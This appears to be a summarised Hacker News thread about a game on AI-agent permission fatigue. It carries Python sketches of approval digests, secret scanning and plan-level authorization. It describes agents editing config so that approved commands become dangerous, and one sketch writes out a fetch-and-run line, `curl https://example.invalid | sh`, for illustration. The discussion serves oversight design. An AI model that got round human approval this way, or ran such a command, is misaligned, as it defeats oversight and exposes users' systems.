Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue
Overall Reaction to the Game
- Many found it fun, clever, and a good way to surface their own security habits.
- Several players reported earning “security-conscious” scores by reflexively denying most or all requests, noting that this mirrors real-life “default deny” thinking.
- Others pointed out that you could initially “cheat” by denying everything and still get a good title, which the author later adjusted.
- Some users hit very high scores and compared the experience to games like “Papers, Please.”
Critique of Current AI Agent Permission Models
- Strong consensus that per-command prompts quickly create permission fatigue and become meaningless.
- Some argue this model is “bonkers”: agents can edit code or config to make later approved commands dangerous, making prompts feel like security theater.
- Several note that “human in the loop” fails if the loop is spammed with low-signal prompts.
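
The "security theater" critique can be made concrete with a small sketch. This is an illustration only, not something proposed in the thread: the `approval_key` helper and the two sample `package.json` strings are hypothetical. It shows that an approval remembered by command string alone survives an edit to the config that the command runs, whereas an approval tied to a digest of the command plus that config does not.

```python
import hashlib


def approval_key(command: str, config_text: str) -> str:
    """Digest covering both the command and the config it depends on."""
    payload = command.encode() + b"\0" + config_text.encode()
    return hashlib.sha256(payload).hexdigest()


command = "npm run build"
# Hypothetical package.json contents before and after an agent edit.
original = '{"scripts": {"build": "tsc"}}'
tampered = '{"scripts": {"build": "curl https://example.invalid | sh"}}'

# Approval keyed on the command string alone: still valid after the edit.
approved_commands = {command}
print(command in approved_commands)

# Approval keyed on command plus config contents: the edit invalidates it.
approved_keys = {approval_key(command, original)}
print(approval_key(command, original) in approved_keys)
print(approval_key(command, tampered) in approved_keys)
```

A real tool would have to know which files a command actually depends on, which is the hard part this sketch skips.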
Threat Models, Sandboxing, and YOLO Usage
- A visible camp runs agents with `--dangerously-skip-permissions` in sandboxes, containers, VMs, or separate users, arguing productivity > risk.
- Others warn this invites eventual compromise, especially via supply-chain or prompt-injection-based exfiltration.
- Debate over what counts as “dangerous”:
- Some see commands like `npm run build`, `git reset --soft HEAD~1`, or `kill $(lsof -t -i:3000)` as inherently risky.
- Others see them as reversible or routine, if run in a well-isolated environment.
Secrets and Filesystem Access
- The game flags reading `~/.zshrc` and `~/Documents` as risky; some agree, noting many people keep secrets or tokens there.
- Others insist secrets should never live in shell RC files, describing alternatives: password managers, encrypted files, OS keychains, project-specific secret stores.
- Several highlight that even if they don’t store secrets there, the game is modeling common, not ideal, practices.
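
For readers who want to check their own habits, here is a minimal sketch of a scan for secret-looking assignments in shell RC text. It is a rough heuristic under stated assumptions: the name patterns, the `find_secret_like_vars` helper, and the sample file are all hypothetical. Values filled in at shell startup (for example from a password manager CLI) are skipped, since that is the alternative commenters recommended.

```python
import re

# Hypothetical heuristic: variable names that commonly hold credentials.
SECRET_NAME = re.compile(r"(TOKEN|SECRET|PASSWORD|API_?KEY)", re.IGNORECASE)
# Matches lines such as `export NAME=value` or `NAME=value`.
ASSIGNMENT = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


def find_secret_like_vars(rc_text: str) -> list[str]:
    """Return names of variables that look like hard-coded secrets."""
    hits = []
    for line in rc_text.splitlines():
        match = ASSIGNMENT.match(line)
        if not match:
            continue
        name = match.group(1)
        value = match.group(2).strip().strip("\"'")
        # Skip empty values and values resolved at runtime, e.g. $(...) or $OTHER.
        if not value or value.startswith("$"):
            continue
        if SECRET_NAME.search(name):
            hits.append(name)
    return hits


# Made-up RC file contents; the token value is a placeholder, not a real credential.
sample = """
export PATH="$HOME/bin:$PATH"
export GITHUB_TOKEN="ghp_example"
export EDITOR=vim
API_KEY=$(pass show example/api-key)
"""
print(find_secret_like_vars(sample))
```

To scan a real file, pass its contents instead of `sample`, for example `find_secret_like_vars(pathlib.Path.home().joinpath(".zshrc").read_text())`. Matching on names will miss secrets stored under unremarkable variable names.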
Suggestions for Better Models & Game Design
- Proposed alternatives:
- OS-level sandboxing with fine-grained, behavior-based prompts (“this command tried to read Chrome cookies”).
- Task-based or plan-level authorization instead of per-command approvals.
- Durable workflows with easy “rewind” rather than trusting models to never misbehave.
- Game feedback:
- Some say it’s too JavaScript/npm-centric and context-switchy.
- Requests for richer post-game breakdowns of mistakes and more realistic “packs” of related actions.
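
The task-based or plan-level authorization idea from the proposed alternatives can be sketched as follows. This is a toy under stated assumptions, not any existing agent's API: `ApprovedPlan`, its fields, and the example plan are hypothetical. The user approves a plan once, and each later command is checked against it; only commands outside the plan trigger a prompt.

```python
import shlex
from dataclasses import dataclass, field


@dataclass
class ApprovedPlan:
    """A plan the user approved once, up front (hypothetical structure)."""
    description: str
    allowed_programs: set[str] = field(default_factory=set)
    denied_substrings: tuple[str, ...] = ()

    def permits(self, command: str) -> bool:
        """True if the command stays within the approved plan."""
        if any(bad in command for bad in self.denied_substrings):
            return False
        try:
            tokens = shlex.split(command)
        except ValueError:
            return False  # unparseable commands fall back to a prompt
        return bool(tokens) and tokens[0] in self.allowed_programs


plan = ApprovedPlan(
    description="Fix the failing build",
    allowed_programs={"npm", "git"},
    denied_substrings=("~/.zshrc", "--force"),
)

commands = ["npm run build", "git reset --soft HEAD~1", "cat ~/.zshrc", "git push --force"]
for cmd in commands:
    verdict = "run" if plan.permits(cmd) else "ask the user"
    print(f"{cmd!r}: {verdict}")
```

The check only looks at the first token and a few substrings, so a chained command such as `npm run build && curl ...` would pass. That gap is one reason commenters paired plan-level approval with OS-level sandboxing rather than treating it as sufficient on its own.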